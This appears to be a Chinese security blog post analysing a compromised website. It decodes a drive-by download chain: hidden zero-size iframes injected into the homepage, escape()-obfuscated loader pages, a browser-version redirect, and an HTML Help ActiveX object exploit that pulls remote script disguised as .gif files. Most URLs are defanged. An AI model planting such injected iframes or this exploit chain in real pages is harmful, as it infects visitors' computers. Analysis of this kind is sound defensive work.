发现一个技术升级了的带毒网站（第1版）

endurer原创

网站首页被插入恶意代码：

＜iframe src='hxXP://www.***hyap98.com/123/wawa.htm' width='0' height='0' frameborder='0'＞＜/iframe＞＜iframe src='hxxp://djloveQQ.***go3.icpcn.com/cert/joke.htm' width='0' height='0' frameborder='0'＞＜/iframe＞

hxxp://www.***hyap98.com/123/wawa.htm的部分内容经过escape()加密，upescape()后为：

＜Html＞

＜HEAD＞

＜SCRIPT LANGUAGE="javascript"＞

＜!--

var Words="＜iframe src="hxxp://www.***hyap98.com/123/music.htm" width='0' height='0' frameborder='0'＞＜/iframe＞

＜iframe src="hxxp://www.***hyap98.com/rx/joke.htm" width='0' height='0' frameborder='0'＞＜/iframe＞"

function SetNewWords()

{

var NewWords;

NewWords=unescape(Words);

document.write(NewWords);

}

SetNewWords();

// --＞

＜/SCRIPT＞

＜/HEAD＞

＜BODY＞

＜/BODY＞

＜/HTML＞

hxxp://www.***hyap98.com/123/music.htm的部分内容经过escape()加密，upescape()后为：

＜HTML＞

＜HEAD＞

＜SCRIPT LANGUAGE="Javascript"＞

＜!--

var Words="＜embed type="audio/x-pn-realaudio-plugin"

src="music.smi"

controls="controlpanel,statusbar" height=95

width=150 autostart=true＞"

function SetNewWords()

{

var NewWords;

NewWords=unescape(Words);

document.write(NewWords);

}

SetNewWords();

// --＞

＜/SCRIPT＞

＜/HEAD＞

＜BODY＞

＜/BODY＞

＜/HTML＞

hxxp://www.***hyap98.com/rx/joke.htm的内容为(已去掉开头的多个空格)：

＜center＞＜font color=red＞对不起,您访问的页面不存在!＜/font＞＜center＞ ＜script language=javascript＞ie='windows';ver=navigator.appVersion;if(!(ver.indexOf('NT 5.0')==-1))ie='winnt';if(!(ver.indexOf('Windows 98')==-1)){ie='w98';}location.href=ie+'.htm';＜/script＞

此网页检查IE版本，并打开相应的网页windows.htm、wint.htm或w98.htm。

hxxp://www.***hyap98.com/rx/windows.htm的部分内容经过escape()加密，upescape()并去掉多余的起始空格后为：

＜HTML＞

＜HEAD＞

＜SCRIPT LANGUAGE="Javascript"＞

＜!--

var Words="＜SCRIPT language=VScript src="http://www.qqread.com/java/young.gif"＞＜/SCRIPT＞＜SCRIPT language=VScript src="young.Css"＞＜/SCRIPT＞＜HTML＞＜BODY＞＜div style="display:none"＞＜OBJECT id="news526" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"＞＜PARAM name="Command" value="Related Topics, MENU"＞＜PARAM name="Window" value="$global_ifl"＞＜PARAM name="Item1" value='command;/windows/help/apps.chm');＜/OBJECT＞＜OBJECT id="news215" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"＞＜PARAM name="Command" value="Related Topics, MENU"＞＜PARAM name="Window" value="$global_ifl"＞＜PARAM name="Item1" value='command;javascript:eval("document.write(\"＜SCRIPT language=JScript src=\\\"hxxp://www.***hyap98.com/rx/young.gif\\\"\"+String.fromCharCode(62)+\"＜/SCR\"+\"IPT\"+String.fromCharCode(62))")'＞＜/OBJECT＞＜/div＞＜SCRIPT＞news526.Click();f1=1+1;f1=f1+2;setTimeout("news215.Click();",0);fu1=2;fu1=3+4;＜/SCRIPT＞＜/BODY＞＜/HTML＞"

• ·技术评论：明天，中间件在哪？
• ·温州IT主管联盟的未来走向
• ·The Three Faces of SOA
• ·我的第一个j2me程序
• ·Java中文处理, 资源包后缀详解
• ·查询数据库后返回Iterator
• ·项目经理需知的Java技术问题
• ·10年回顾:世界各地开发高手谈Java
• ·Java 理论和实践: 用软引用阻止内存泄漏
• ·软件资产重用的具体内容